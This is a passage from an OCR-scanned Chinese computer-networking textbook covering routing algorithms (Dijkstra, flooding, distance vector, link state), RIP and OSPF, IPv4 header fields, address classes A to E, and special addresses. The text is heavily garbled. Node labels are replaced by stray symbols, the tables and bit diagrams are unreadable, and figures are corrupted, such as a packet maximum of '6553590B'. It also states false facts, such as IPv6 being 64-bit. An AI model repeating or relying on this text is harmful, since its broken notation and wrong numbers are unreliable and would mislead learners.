在 面向 连接 服务 中 ,每 个 数据 包 不 需 携带 目的 地 址 ,所 有 数据 包 统 一 路 径 类 似 于 管道 方 
式 在 网 络 中 传送 ,不 存在 乱 序 和 丢 包 问题 ,可 靠 性 高 ,但 实现 复杂 ,并且 建立 连接 需要 一 定时 
延 ,适用 于 传输 实时 性 较 高 和 数据 量 较 大 的 场合 。 
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图 5-4 面向 连接 服务 


5.2 网 络 层 路 由 选择 


路 由 器 用 于 实现 异 构 网 络 之 间 的 连接 ,根据 数据 包 目 的 地 址 计算 最 佳 路 径 转 发 至 下 一 
路 由 器 ,一 跳 一 跳 以 接力 方式 将 数据 包 从 源 节点 投递 至 目的 节点 。 这 里 的 最 佳 路 径 不 一 定 
是 最 短路 径 ,而 是 通过 跳 数 、 延 迟 和 带宽 等 参数 计算 而 得 ,将 其 称 为 路 由 算法 。 

路 由 选择 算法 分 为 静态 路 由 算法 和 动态 路 由 算法 。 静 态 路 由 算法 是 在 建立 连接 前 预先 
算出 来 的 ,路 由 表 信息 由 管理 员 指定 ,算法 简单 易于 实现 ,但 无 法 适应 网 络 动态 变化 ,不 能 根 
据 网 络 流量 和 拓扑 变化 调整 路 由 ,因此 也 被 称 为 非 自 适应 算法 ,一 般 适 应 于 小 型 网 络 或 拓扑 
结构 相对 稳定 的 网 络 中 。 

动态 路 由 算法 可 以 根据 网 络 当 前 状态 变化 动态 做 出 路 径 选 择 ,通过 接收 网 络 中 其 他 路 
由 器 更 新 的 路 径 信 息 定期 更 新 路 由 ,以 此 适应 网 络 拓扑 变化 ,适应 于 大 型 .复杂 多 变 的 网 络 
环境 。 


5.2.1 最 短路 径 算 法 


最 短路 径 算法 属于 静态 路 由 算法 ,也 被 称 为 Dijkstra 算法 ,用 于 计算 两 节点 之 间 最 短 通 
路 ?。 下 面 以 图 5-5 为 例 计算 源 节点 1 到 网 络 中 其 他 各 节点 的 最 短路 径 。 
5 


图 5-5 最 短路 径 算法 实例 


@ 最 短路 径 不 一 定 是 最 佳 路 径 , 也 不 一 定 是 最 短 的 物理 通路 。 所 谓 最 短 , 既 可 以 以 实际 地 理 距 离 度量 ,也 可 以 用 
网 段 数 量 、 列 队长 度 和 传输 延迟 等 参数 度量 。 
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(1) 初始 化 。 令 {NN} 表 示 网 络 节 点 集合 ,初始 状态 下 N 二 {@}); 若 以 节点 加 为 源 节点 ， 
其 他 节点 车 与 N 直接 相连 , 则 通过 N 到 达 源 节点 的 距离 为 实际 距离 ,否则 为 2。 

(2) 步骤 一 : 从 5 个 节点 中 找 出 距 源 节点 最 小 的 节点 @ 并 加 入 N 中 ,此 时 N={@， 
@); 其 他 不 在 {N} 中 的 节点 车 与 {N} 中 的 任意 节点 直接 相连 ,那么 其 通过 { N} 到 达 源 节点 
钙 的 距离 为 实际 距离 ,否则 为 = 。 

(3) 步骤 二 至 步骤 五 依次 重复 步骤 一 ,直到 网 络 中 所 有 节点 都 在 {N} 中 为 止 ,从 而 算出 
源 节点 四 到 节点 加 的 最 短 距 离 为 2, 到 节点 加 的 最 短 距离 为 3, 到 节点 四 的 最 短 距 离 为 1, 到 
节点 @ 的 最 短 距 离 为 2, 到 节点 @ 的 最 短 距离 为 2, 最 短路 径 算法 见 表 5-1。 


表 5-1 最 短路 径 算法 


步骤 {N} 节点 @ 节点 四 节点 图 节点 @ 节点 @ 
初始 化 {OD} 2 5 1 co co 
步骤 一 {0D.,@} 2 4 最 短 距离 为 1 2 co 
步骤 二 {0,@.,®} 2 3 最 短 距离 为 1 | 最 短 距离 为 2 4 


步骤 三 (0D.,O.,@.O)} 最 短 距离 为 2 3 最 短 距离 为 1 | 最 短 距离 为 2 4 
步骤 四 | 4D,@D,@,@,@} | 最 短 距离 为 2| 最 短 距离 为 3| 最 短 距离 为 1 | 最 短 距离 为 2 4 
步骤 五 | 10D,D,@,@.,@,@)| 最 短 距 离 为 2| 最 短 距 离 为 3| 最 短 距 离 为 1| 最 短 距 离 为 2| 最 短 距离 为 4 


5.2.2 扩散 法 


第 二 种 静态 路 由 算法 是 扩散 法 。 当 网 络 中 的 某 个 节点 接收 到 不 是 发 给 它 的 数据 包 时 ， 
将 转发 至 除 发 送 线路 以 外 的 所 有 线路 上 去 。 扩 散 法 健壮 性 强 ?, 通 过 复制 的 大 量 数 据 包 总 
能 在 第 一 时 间 抵 达 目 的 节点 ,但 同时 也 带 来 数据 包 拥塞 循环 的 问题 。 

如 图 5-6 所 示 , 源 节点 外 将 数据 包 发 送 给 节 源 节 点 


点 四 和 节点 回 。 节 点 2 接收 到 后 要 转发 给 节点 (1) DG 
四 和 节点 @ ,节点 @ 要 转发 给 节点 〇 .节点 0 和 “全 

节点 ;而 节点 加 又 会 转发 给 源 节 点 ,从 而 带 I 

来 数据 包 循环 堵塞 带宽 问题 ,在 实际 中 必须 采取 “全 T (9 
相应 措施 限制 网 络 中 扩散 的 数据 包 数 量 。 第 一 

种 方法 是 在 每 个 数据 包 上 附加 计数 器 ,数据 包 每 (9) 一 一 (0) 一 一 《一 一 (2 
经 过 一 个 节点 计数 器 减 1, 减 到 *0” 时 数据 包 被 丢 目的 节点 
弃 ; 第 二 种 方法 是 记录 下 已 复制 过 的 数据 包 吕 免 图 5.6 扩散 法 


再 次 扩散 。 如 当 节点 @@ 已 接收 到 来 自 源 节点 四 
的 数据 包 时 , 若 稍 后 又 接收 到 来 自 节点 @ 转 发 的 相同 数据 包 , 则 将 之 丢弃 ,以 避免 数据 包 陷 
入 循环 。 

在 复杂 多 变 的 网 络 拓扑 中 ,一般 使 用 动态 路 由 算法 。 常 用 的 动态 路 由 算法 有 距离 向 量 
路 由 算法 和 链 路 状态 路 由 算法 。 


@ ”扩散 法 主要 应 用 于 军事 用 途 , 当 部 分 中 间 节点 被 炸 毁 或 故障 时 仍 能 抵达 目的 节点 。 
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s.2.3 距离 向 量 路 由 算法 


在 距离 向 量 路 由 算法 中 ,每 个 路 由 器 周期 性 向 邻居 路 由 器 发 送 抵达 整个 网 络 的 路 由 信 
息 ,同时 也 从 相 邻 路 由 器 接收 相同 的 路 由 信息 并 建立 和 维护 路 由 表 , 从 而 网 络 中 所 有 路 由 节 
点 都 能 计算 出 抵达 其 他 节点 的 距离 ,如 图 5-7 所 示 。 


\\ 
国防 JI 
BD | 一 | | 
到 Mk@ |s -| | 
到 达 @) 
到 达 @ 
路 由 表 
(a 
到 达 Q@ 上 5 到 达 @ | 一 | 5|112| 8 
到 达 @ | 5 | 一 到 达 @ | 5 | 一 | 713 
到 达 @ |12|7 到 达 @ | 12| 7| 一 | 4 
到 达 @ | 11 到 达 @ 四 固 四 图 
路 由 表 路 由 表 
© 四 


图 5-7 距离 向 量 路 由 算法 


如 图 5-7(a) 所 示 ,路 由 器 加 启动 后 周期 性 与 相 邻 路 由 器 四 相互 发 送 echo 包 9, 计 算 彼 
此 间距 离 为 5。 

如 图 5-7(b) 所 示 ,路 由 器 加 启动 后 同样 与 相 邻 路 由 器 四 发 送 echo 包 , 计 算 两 者 之 间距 
离 为 7。 在 相互 交换 的 路 由 信息 中 ,路 由 器 @@ 得 知 路 由 器 加 能 抵达 路 由 器 中 ,距离 为 5, 则 计 
算出 它 通过 路 由 器 加 抵达 路 由 器 @ 的 距离 为 12; 路 由 器 回 将 抵达 路 由 器 加 的 信息 通过 
echo 包 发 给 路 由 器 中 ,从 而 路 由 器 四 也 知道 能 通过 路 由 器 加 抵达 路 由 器 @ ,距离 为 12。 

如 图 5-7(c) 所 示 ,同样 原理 ,路 由 器 @ 田 启动 后 与 相 邻 路 由 器 加 相互 发 送 echo 包 并 计算 
彼此 间距 离 为 4。 在 相互 交换 的 路 由 信息 中 ,路 由 器 四 计算 出 通过 路 由 器 @@ 能 抵达 路 由 器 


@。 echo 称 为 响应 包 , 路 由 器 加 将 信息 发 送 给 路 由 器 ,路 巾 器 四 对 之 进行 回复 , 称 为 响应 。 
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四 和 加 ,距离 分 别 为 16 和 11; 路 由 器 @@ 将 抵达 路 由 器 @ 田 的 信息 通过 echo 包 向 路 由 器 回转 
发 ,路 由 器 @ 再 向 路 由 器 四 转发 ,直至 网 络 中 所 有 路 由 器 都 计算 出 彼此 间 的 距离 ,为 选择 最 

如 图 5-7(d) 所 示 , 当 路 由 器 四 和 路 由 器 四 互联 后 相互 发 送 echo 包 计算 出 彼此 间距 离 为 
3 ,双方 更 新 路 由 表 , 并 把 路 由 更 新 信息 通过 echo 包 转 发 给 与 其 相 邻 的 路 由 器 和 @。 

通过 相 邻 节点 间 彼 此 周期 性 交换 路 由 信息 ,网 络 中 所 有 路 由 器 都 能 计算 出 抵达 其 他 所 
有 节点 的 最 短路 径 ,动态 适应 网 络 拓扑 结构 变化 。 

距离 向 量 路 由 算法 虽然 能 动态 适应 网 络 变化 ,但 相 邻 节点 间 周 期 性 交换 echo 包 会 产生 
较 大 流量 ,占用 带宽 ,适用 于 小 规模 网 络 。 采 取 距 离 向 量 路 由 算法 的 协议 有 RIP(Routing 
information Protocol) 路 由 信息 协议 2 和 IGRP(Interior Gateway Protocol) 内 部 网 关 路 由 
协议 。 


5.2.4 链 路 状态 路 由 算法 


距离 向 量 路 由 算法 中 的 路 径 成 本 只 考虑 到 距离 ,而 忽略 了 带宽 ,拥塞 等 因素 。 链 路 状态 
路 由 算法 中 的 路 径 成 本 除了 以 距离 为 度量 外 还 增加 了 链 路 带宽 参数 ,选择 的 路 径 不 再 是 最 
短路 径 ,而 是 最 佳 路 径 ,实现 步骤 如 下 。 

(1) 网 络 中 每 个 路 由 器 启动 后 自动 发 现 与 其 直接 连接 的 邻居 节点 。 

(2) 通过 echo 包 测 量 与 邻居 节点 的 成 本 花 销 ,包括 距离 .延迟 和 带宽 。 

(3) 将 以 上 信息 向 全 网 路 由 器 广播 。 

(4) 接收 网 络 中 其 他 路 由 器 发 送 的 路 由 信息 广播 包 , 并 计算 出 抵达 全 网 络 路 由 的 最 佳 
路 径 。 

链接 状态 路 由 算法 实现 复杂 ,能 在 更 短 时 间 内 适应 网 络 拓扑 变化 ,适用 于 大 规模 网 络 。 
采用 链接 状态 路 由 算法 最 典型 协议 是 OSPF(Open Shortest Path First) 开 放 式 最 短路 径 优 
先 协议 @。 


5.3 IP 网 际 协议 


IP(Internet Protocol) 网 际 协议 是 网 络 层 主要 协议 , 它 定义 了 计算 机 接 人 互联 网 时 相互 
的 约定 和 准则 ,统一 传输 规范 ,使 异 构 网 络 能 够 互联 。 任 何 厂 家 生产 的 计算 机 系统 只 要 遵守 
IP 协议 ,都 可 以 与 因特网 中 其 他 计算 机 进行 通信 。 


5.3.1 IP 数据 包 格 式 
IP 数据 包 相当 于 网 络 投递 中 的 信封 , 它 说 明了 数据 发 送 的 源 地址 和 目的 地 址 以 及 数据 


@@RIP 路 由 协议 每 隔 30s 发 送 一 次 路 由 信息 更 新 ,以 跳跃 计数 为 尺度 衡量 路 由 距离 ,数据 包 每 经 一 个 路 由 器 称 为 
- 跳 。 若 经 过 的 路 由 器 计数 相同 , 则 RIP 认为 两 段 距离 相等 。RIP 最 多 支持 15 跳 , 即 与 目的 主机 之 间 最 多 可 被 15 个 路 
由 器 接力 投递 ,适用 于 小 规模 网 络 。 
@ ”OSPF 协议 在 整个 网 络 中 划 出 若干 区 域 ,区 域内 路 由 器 都 维护 一 个 相同 的 、 完 整 的 全 网 链 路 状态 数据 库 , 路 由 器 
彼此 交换 数据 库 , 从 而 掌握 全 网 拓扑 结构 ,并 计算 最 佳 路 由 。 
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传输 状态 。 一 个 完整 的 数据 包 由 首部 和 数据 两 部 分 组 成 。 首 部 前 20B 属于 固定 长 度 ,是 所 
有 IP 数 据 包 必须 含有 的 ; 后 面 是 可 选 字 段 ,其 长 度 可 变 。 首 部 后 面 是 数据 包 所 携带 的 数 
据 , 如 图 5-8 所 示 。 


位 0 4 8 16 19 31 
| 版 本 号 [首部 长 度 | 。 服务 类 型 数据 包 总 长 度 
| 标识 标志 段 偏 移 
首 | 生存 时 间 协议 首部 检验 和 
部 | 源 地 址 
| 目的 地 址 
| 可 选 字段 + 填充 
| 数据 部 分 
首部 数 所 
一 IP 数 据 包 一 


图 5-8 JP 数据 包 格式 


1. 版 本 号 (4b) 

版 本 号 占 4 位 ,是 基于 IP 协议 传输 所 使 用 的 版 本 号 。 目 前 ,使 用 最 广泛 的 是 第 四 版 本 ， 
称 为 IPv4 。 

2. 首部 长 度 (4b) 

首部 长 度 用 于 指出 IP 包头 长 度 ,并 标识 数据 包头 在 何 处 结束 .所 携带 的 数据 在 何 处 开 
始 。 首 部 长 度 占 4 位 ,数值 范围 为 5 一 15。 若 首部 长 度 系 数 以 4B 为 单位 , 则 IP 首部 长 度 为 
20 一 60B9@。 如 假设 首部 长 度 取 值 *1010”, 转 换 为 十 进 制 为 "10”, 表 示 卫 包头 长 度 为 10X4 一 
40B, 即 数据 从 第 41 字 节 开始 。 

3. 服务 类 型 (8b) 

服务 类 型 用 于 获得 更 好 服务 ,大 多 数 情况 下 并 不 使 用 。 当 网 络 流量 较 大 时 ,路 由 器 会 根 
据 不 同 数据 包 服 务 类 型 取 值 决定 哪些 先 发 送 .哪些 后 发 送 ,如 图 5-9 所 示 。 


| i 
优先 级 D|TI|R|C | 未 用 
图 5-9 服务 类 型 格式 


(1) 前 3 个 bit 表示 优先 级 , 取 值 范围 为 0~7, 共 8 个 优先 级 ,数值 越 低 优先 级 越 高 。 
(2) 后 四 位 是 服务 类 型 字段 ,用 于 标识 QOS 质量 服务 。 

中 D: 表示 要 求 更 低 时 延 。 

@T: 表示 要 求 更 大 吞吐 量 。 

@ R: 表示 要 求 更 高 可 靠 性 。 


@®@ 5X4 一 15X4。 
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@ C: 表示 要 求 更 小 路 径 开销 。 

注 : DTRC 默认 4 位 值 都 为 0, 表示 一 般 服务 。 

DTRC 只 能 将 1 位 设 为 1, 如 工 为 1, 则 其 余 三 位 只 能 为 0。 

(3) 最 后 1 位 尚未 使 用 。 

4. 数据 包 总 长 度 (16b) 

数据 包 总 长 度 用 于 标识 整个 数据 包 ( 包 含 包 头 和 数据 ) 总 长 度 ,结合 首部 长 度 可 以 计算 
出 数据 包 携 带 数据 的 起 始 地 址 和 长 度 。 数 据 包 总 长 度 占 16 位 ,最 大 取 值 为 16 个 “1”, 以 字 
节 (B) 为 单位 ,因此 数据 包 最 大 长 度 为 6553590B。 但 是 ,由 于 以 太 网 (局 域 网 ) 人 允许 的 最 大 包 
长 度 为 1500B, 因 此 当 超 过 网 络 允 许 的 最 大 长 度 时 需 将 过 长 数据 包 分 片 。 

5. 标识 (16b) 

标识 占 16 位 ,用 于 数据 包 在 分 片 重组 时 标识 序列 号 。 当 网 络 层 将 数据 分 片 打 包 后 ,由 
于 数据 包 会 沿 着 不 同 路 径 在 网 络 中 各 自 投递 , 故 抵达 目的 节点 会 存在 乱 序 问题 。 解 决 方法 
是 将 数据 包 贴 上 序号 标识 ,抵达 目的 节点 再 根据 序号 重组 还 原 成 初始 数据 。 

6. 标志 (3b) 

标志 用 于 表示 数据 包 分 片 信息 ,如 图 5-10 所 示 。 2 

(1) MF: 更 多 数据 包 (More Fragment)。MF 王 1 表示 后 面 还 有 | MF | DF | 未 用 
分 片 的 数据 包 ; MEF=0 表示 没有 更 多 分 片 ,本 数据 包 是 最 后 一 个 ”图 5-10 标志 格式 
苏 片 。 

(2) DF: 不 分 段 (Do Not Fragment) ,DF 二 1 表示 该 数据 包 不 能 被 分 片 ,DF=0 表示 该 
数据 包 可 以 被 分 片 。 

(3) 最 后 1 位 尚未 使 用 。 

7. 段 偏 移 (13b) 

段 偏 移 用 于 标识 本 片 数据 在 初始 数据 报 文 中 的 偏 移 量 , 占 13 位 , 偏 移 单位 为 8B。 当 较 
长 数据 分 片 后 ,其 中 原 数据 的 相对 位 置 。 

8. 生存 时 间 (8b) 

生存 时 间 TTL(Time To Live) 占 8 位 。TTL 初始 值 由 操作 系统 设置 ,数据 包 每 经 一 个 
路 由 器 转发 TTL 值 减 1, 减 至 “0” 时 被 丢弃 ,从 而 避免 数据 包 在 找 不 到 目的 地 时 不 断 被 转 
发 ,堵塞 网 络 带宽 。 

9. 协议 (8b) 

协议 字段 用 于 标识 数据 包 所 使 用 的 传输 协议 ,如 是 TCP 协议 还 是 UDP 协议 。 目 的 主 
机 收 到 数据 包 后 会 根据 协议 字段 值 交 付 上 层 相 应 协议 处 理 。 

10. 首部 校 验 和 (16b) 

首部 校 验 和 只 对 IP 数据 包 首 部 进行 校 验 ,不 包含 数据 部 分 。 数 据 包 每 经 过 一 个 中 间 节 
点 投递 都 要 重新 计算 首部 校 验 和 ,对 首部 字段 进行 校 验 。 

11. 源 地 址 (4B) 

源 地 址 用 于 标识 发 送 主机 的 IP 地 址 。 由 于 IP 地 址 长 度 为 32b, 因 此 源 地 址 段 占 4B。 


@ “1111111111111111? 共 16 个 “1 转换 为 十 进 制 为 65535。 
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12. 目的 地 址 

目的 地 址 用 于 标识 接收 主机 的 IP 地 址 。 

13. 选项 字段 和 填充 (40b) 

有 时 需要 在 选项 字段 填充 额外 的 “0” 以 保证 IP 包头 长 度 是 32 位 的 整数 倍 。 选 项 字段 
很 少 使 用 ,并 非 所 有 主机 和 路 由 器 都 支持 可 选项 ,这 里 不 做 介绍 。 


5.3.2 ”IP 地址 分 类 


IP 地 址 在 全 球 具有 唯一 性 ,每 个 IP 地 址 由 4B, 共 32 位 二 进 制 码 组 成 ,分 为 网 络 号 和 主 
机 号 两 个 部 分 ,是 一 个 逻辑 编号 2?。IP 地 址 根据 网 络 号 和 主机 号 长 度 的 不 同 可 以 分 为 A、B、 
C.D.E 共 5 类 ， 

1 A 类 IP 地 址 

首位 定义 为 “0” 的 IP 被 称 为 A 类 IP。 在 A 类 IP 中 ,网 络 号 占 8 位 ,剩余 24 位 作为 主 
机 位 ,如 图 5-11 所 示 。 由 于 A 类 IP 首位 为 “0”, 可 供 标识 的 网 络 位 只 有 7 位 ,最 小 值 为 
“00000000”( 二 进 制 为 0), 最 大 值 为 ~01111111”( 二 进 制 为 127) ,理论 上 能 够 容纳 2 = 二 128 个 
网 络 。 其 中 网 络 号 为 0 的 IP 不 能 标识 具体 网 络 2; 网 络 号 为 127 的 IP 属于 特殊 IP9, 因 此 
A 类 IP 实际 上 只 能 容纳 126 个 网 络 。 后 24 个 主机 位 理论 上 能 够 容纳 2*( 约 1700 万 ) 个 主 
机 ,其 中 全 “0?"@ 主 机 号 和 全 “1?@ 主 机 号 作为 特殊 IP 不 能 标识 主机 ,因此 一 个 A 类 网 络 能 容 
纳 2* 一 2 个 主机 ,所 有 A 类 IP 共 能 容纳 126X(22# 一 2) 个 主机 ,适用 于 规划 大 规模 网 络 。 

(1) 起 始 位 : 0。 

(2) 网 络 规模 : 大 规模 网 络 。 


A 类 [P|0 | | 
A J 
网 络 位 : 8 位 主机 位 : 24 位 
IP 最 小 值 |ojo1olololololollolololololojolollolololololololollolololololololo 
0. 0 0 0 
mp 最 大 值 oLTTTTTDTTTTTTTIUTTTTTTDOIOTTTTTT 
127. 255 255 255 


图 5-11 A 类 IP 示 意图 


@ 用 外 地 址 标识 主机 源 于 现实 生活 ,例如 要 在 校园 中 找 一 个 张 三 的 人 ( 张 三 相 当主 机 的 Mac 地 址 ) 很 困难 ,于 是 
把 人 分 班 分 号 ,网 络 号 相当 于 班 别 号 ,主机 号 相当 于 学 号 ,以 后 找 张 三 这 个 人 可 以 简化 为 找到 某 个 班 的 某 个 学 号 。 同 样 
在 网 络 中 找 某 个 主机 也 相当 于 找 某 个 网 络 中 的 某 个 编号 的 主机 ,如 192. 168. 1. 10 用 于 标识 隶属 于 192. 168. 1 网 络 中 的 
第 10 个 主机 。 

回 网络 号 相当 于 班 别 号 , 班 别 号 不 能 为 0, 如 现实 中 不 存在 网 络 0 班 。 

图 网 络 位 以 127 开头 的 了 了 用 于 回环 地 址 测试 ,如 本 地 网 络 测试 地 址 为 127. 0. 0. 1 ,ping 127. 0. 0. 1 相当 于 ping 本 
机 实际 IP。 

图 ”主机 号 相当 于 学 号 ,学 号 不 能 为 0, 如 现实 中 不 存在 第 0 号 学 生 . 

加 ”主机 号 全 “1” 的 IP 用 于 标识 此 网 络 中 的 所 有 主机 ,属于 广播 地 址 。 
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(3) IP 范围 : 0.0.0.0 一 127. 255. 255. 255@。 

(4) 首 个 值 域 : 0 一 127@。 

(5) 可 容纳 的 网 络 数量 : 2 一 2 一 126 。 

(6) 每 个 网 络 可 容纳 的 主机 数量 : 22 一 2。 

(7) A 类 IP 可 容纳 的 主机 数量 : 126 X (2* 一 2)。 

2. B 类 IP 地址 

B 类 IP 起 始 位 为 “A10”, 网 络 号 占 16 位 ,剩余 的 16 位 作为 主机 位 ,如 图 5-12 所 示 。B 类 
IP 首位 “10” 已 占用 了 两 个 网 络 位 ,可 供 标 识 的 网 络 位 只 有 16 一 2 二 14 位 ,能 够 容纳 2* 个 ®@ 
网 络 。 剩 余 的 16 个 主机 位 理论 上 能 够 容纳 2* 个 主机 ,和 A 类 IP 一 样 ,全 “0” 和 全 “1” 的 主 
机 号 作为 特殊 IP 不 能 标识 主机 ,因此 一 个 B 类 网 络 只 能 容纳 2* 一 2 二 65534 个 主机 ,适用 
于 规划 中 规模 网 络 。 


B 类 IP |1jo | | 
A 
网 络 位 : 16 位 主机 位 : 16 位 
IP 最 小 值 1|olofofofofolo 0lololololololollolololololololo ofolofofofofolol 
128. 0. 0 0 
mp 最 大 值 olTTTTDTTTTTTTIUTTTTTTDIUDTTTTTD 
191, 255: 255. 255 


图 5-12 B 类 1IP 示 意图 


(1) 起 始 位 : 10。 

(2) 网络 规 模 : 中 规模 网 络 。 

(3) IP 范围 , 128. 0. 0. 0 一 191. 255. 255. 255 。 

(4) 首 个 值 域 : 128 一 191@。 

(5) 可 容纳 的 网 络 数量 : 2”。 

(6) 每 个 网 络 可 容纳 的 主机 数量 : 2 一 2。 

(7) B 类 IP 可 容纳 的 主机 数量 : 2* X (2 一 2)。 

3. C 类 IP 地 址 

C 类 IP 起 始 位 为 ~Y110”, 网 络 号 占 24 位 ,剩余 的 8 位 作为 主机 位 ,如 图 5-13 所 示 。C 类 
IP 首位 *110” 已 占用 3 个 网 络 位 ,可 供 标识 的 网 络 位 只 有 24 一 3==21 位 ,能 够 容纳 22 个 @ 网 


@ 不 是 所 有 A 类 IP 都 能 标识 主机 ,特殊 IP 除外 。 

@ 所 有 的 IP 地 址 都 可 以 通过 首 个 值 域 判断 其 IP 地 址 类 型 。 如 IP 为 126. 23. 4. 78 , 首 个 值 域 为 126, 介 于 0 一 127 
之 间 , 属 于 A 类 IP; 192.168. 1. 10 首 个 值 域 为 192, 不 在 0 一 127 之 间 , 则 不 属于 A 类 IP。 

图 B 类 IP 的 起 始 位 为 ~10”, 其 16 个 网 络 位 不 存在 全 “0” 和 全 “1” 现 象 ,也 不 存在 特殊 的 网 络 位 ,因此 可 供 标识 的 网 
络 数量 为 24 ,这 里 不 需要 再 减 2。 

图 首 个 值 域 介 于 128 一 191 之 间 的 他 属于 B 类 IP, 如 172.16.1.10 和 191.34.5.76 等 。 

回 C 类 全 起 始 位 为 ~110”, 其 24 个 网 络 位 不 会 存在 全 “0” 和 全 "1” 现 象 .也 不 存在 特殊 的 网 络 位 ,因此 可 供 标识 的 
网 络 数量 为 23 ,这 里 不 需要 再 减 2。 
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络 。 剩 余 的 8 个 主机 位 理论 上 能 够 容纳 2* 个 主机 ,由 于 全 “0” 和 全 “1” 的 主机 号 作为 特殊 
IP 不 能 标识 主机 ,因此 一 个 C 类 网 络 只 能 容纳 2 一 2 二 254 个 主机 ,适用 于 规划 小 规模 


网 络 


caehldo TT 一 吕 图 可 加 本 可 因 


主机 位 : 8 位 


Er 
已 
全 
Er 


IP 最 小 值 |1|1|ojolo oh ollololololololo ol ofololololololollololololo oo 


下 hh th 由 [TD 
223. 255. 255. 255 


EJ 


IP 最 大 值 


图 5-13 C 类 1IP 示 意图 


(1) 起 始 位 : 110。 
(2) 网 络 规模 : 小 规模 网 络 。 

(3) IP 范围 ; 192.0. 0.0~223. 255. 255. 255。 

(4) 首 个 值 域 : 192 一 223 。 

(5) 可 容纳 的 网 络 数量 : 22 。 

(6) 每 个 网 络 可 容纳 的 主机 数量 : 2 一 2 一 254。 

(7) C 类 IP 可 容纳 的 主机 数量 : 22 X (2 一 2)。 

4.D 类 IP 地 址 

D 类 IP 地 址 起 始 位 为 "1110”, 不 存在 网 络 位 和 主机 位 ,剩余 的 28 位 作为 组 播 位 ,可 划 


分 出 22 个 组 播 地 址 。 组 播 地 址 只 能 作为 目的 地 址 ,不 能 作为 源 地 址 ,用 于 标识 一 组 目标 计 
算 机 ,如 图 5-14 所 示 。 
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D 类 Ip|1| 1| io | | | 


J 
组 播 位 : 28 位 
Lp 最 小 值 io[ololo[o oolojolojojolollololojolojojolo ofolofolofofolo] 
224. 0. 0. 0 
最 大 值 [Lo TUTTTTTDOUTTTTTTD 
239. 255. 255. 255 


图 5-14 DD 类 I 示意 图 


(1) 起 始 位 : 1110。 
(2) 用 途 : 用 于 组 播 通信 。 
(3) IP 范围 : 224.0. 0.0 一 239. 255. 255. 255。 
(4) 首 个 值 域 : 224 一 239 。 
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5. 了 类 也 地 址 

E 类 IP 地址 起 始 位 为 1111”?, 和 DD 类 IP 一 样 不 存在 网 络 位 和 主机 位 ,如 图 5-15 所 
示 。E 类 IP 还 未 使 用 ,作为 保留 地 址 供 日 后 研究 使 用 。 划 分 EE 类 IP 的 原因 其 实 是 当初 IP 
规划 时 对 IP 数量 估计 过 于 乐观 ,把 王 类 作为 保留 IP。 在 今天 全 球 IP 地 址 日 趋 紧张 情况 
下 ,即使 再 使 用 刁 类 地 址 仍 不 能 彻底 解决 IP 匮乏 问题 ,因此 玉 类 IP 至 今 仍 未 使 用 ,而 64 位 
长 度 的 IPv6 将 成 为 网 路 发 展 方向 。 


exw [Th TTTITTTTTTTITIT EE 
也 
28 位 尚未 使 用 
tp 最 小 值 1|1|1|1|ojofolo[ojofofojoljofofoj[ofojolofolololo ofolofofofofolol 
240. 0. 0. 0 
p 最 大 值 [1 下 hh 路] 
255. 255. 255. 255 


图 5-15 EE 类 IP 示 意图 
(1) 起 始 位 : 1111。 
(2) 用 途 : 供 日 后 研究 使 用 。 
(3) IP 范围 : 240.0.0.0~255. 255. 255. 255。 
(4) 首 个 值 域 : 240 一 255 。 
IP 地 址 所 有 分 类 和 详细 说 明 见 表 5-2。 


表 5-2 IP 地 址 分 类 表 和 详细 说 明 


IP 地 址 类 型 起 始 位 首 个 值 域 网 络 数 量 | 主机 数量 /每 个 网 络 用 途 
A 类 0 0~127 27 一 2 Ct 大 规模 网 络 
B 类 10 128~191 2 一 中 规模 网 络 
C 类 110 192~223 2 = 小 规模 网 络 
D 类 1110 224~239 一 = 组 播 网 络 
E 类 1111 240~255 一 = 未 使 用 


5.3.3 特殊 IP 地 址 


IP 地 址 用 于 标识 网 络 中 唯一 设备 ,但 并 不 是 每 一 个 IP 都 可 以 随意 分 配 的 : 有 的 IP 不 
能 分 配给 公 网 ; 有 的 IP 可 被 重复 分 配 ; 有 的 IP 只 能 用 于 特定 场合 ,不 能 标识 网 络 设 备 。 下 
面 详细 介绍 这 些 特殊 IP 地 址 。 

1. 环 回 地 址 

127 网 段 的 A 类 IP 被 称 为 环 回 地 址 ,在 Windows 中 还 被 称 为 *Localhost” ,主要 用 于 测 


@ 市 面 很 多 书 和 资料 将 下 类 IP 起 始 位 定义 为 "11110", 这 是 错误 的 。 如 果 下 类 人 P 起 始 位 为 *11110”, 那 么 E 类 人 P 最 
小 值 为 240.0.0.0, 最 大 值 为 247. 255. 255. 255( 将 二 进 制 11110111 转换 为 十 进 制 是 247) ,这 会 导致 248. 0. 0. 0 一 255. 255. 
255.255 地 址 段 不 属于 A、B、C.D.E 任何 一 类 ,读者 应 从 本 质 上 理解 IP 地 址 划分 原则 ,不 应 死记 硬 背 、 照 本 宣 科 ,以 避免 


85 


网 络 技术 基础 与 安全 
试 网 络 协 议和 环 路 测试 ,不 会 向 外 部 网 络 接口 发 送 。 常 用 的 环 回 地 址 如 下 。 

Cy Io70 0 1 

127. 0.0.1 回 送 地 址 相当 于 本 地 实际 IP, 主 要 用 于 测试 本 地 进程 之 间 的 通信 。 无 论 哪 
个 进程 使 用 回 送 地 址 发 送 数据 ,IP 协议 均 会 立即 返回 至 本 机 ,不 会 在 网 络 之 中 传输 。 例 如 
在 运行 出 口 输入 “ping 127. 0.0.1”, 用 于 测试 本 机 TCP/IP 协议 是 否 安装 或 运行 正常 ; 在 浏 
览 器 中 输入 *http://127.0.0.1”, 用 于 测试 本 地 Web 服务 器 是 否 正常 工作 。 

《37127. ls 3 

在 浏览 器 中 输入 “127. 1. 2. 3”, 用 于 在 排除 网 络 路 由 情况 下 测试 IIS 是 否 正 常 启动 。 

2. 未 知 地 址 

全 “0”IP*0.0.0.0” 表 示 未 知 设备 和 网 络 。 当 网 卡 设置 成 自动 获取 IP 时 ,主机 刚 启 是 
没有 具体 IP 的 ,将 使 用 *0.0.0.0”IP 作为 源 地 址 并 向 所 处 网 络 广 播 ; 网 络 DHCP 服务 器 ? 
接收 到 源 IP 为 全 *0” 的 请 求 包 , 将 从 地 址 池 中 选取 适合 的 IP 分 配给 主机 。 

3. 网 络 位 为 “0” 的 IP 

网 络 位 为 “0” 的 IP 表示 所 处 网 段 的 某 一 主机 。 例 如 ,A 类 特殊 IP*0. 0. 0. 10”, 网 络 位 
为 0, 表示 所 处 网 络 中 的 第 10 个 主机 ;“0.0.1.2” 表 示 所 处 网 络 中 主机 号 为 1. 2 的 主机 , 即 
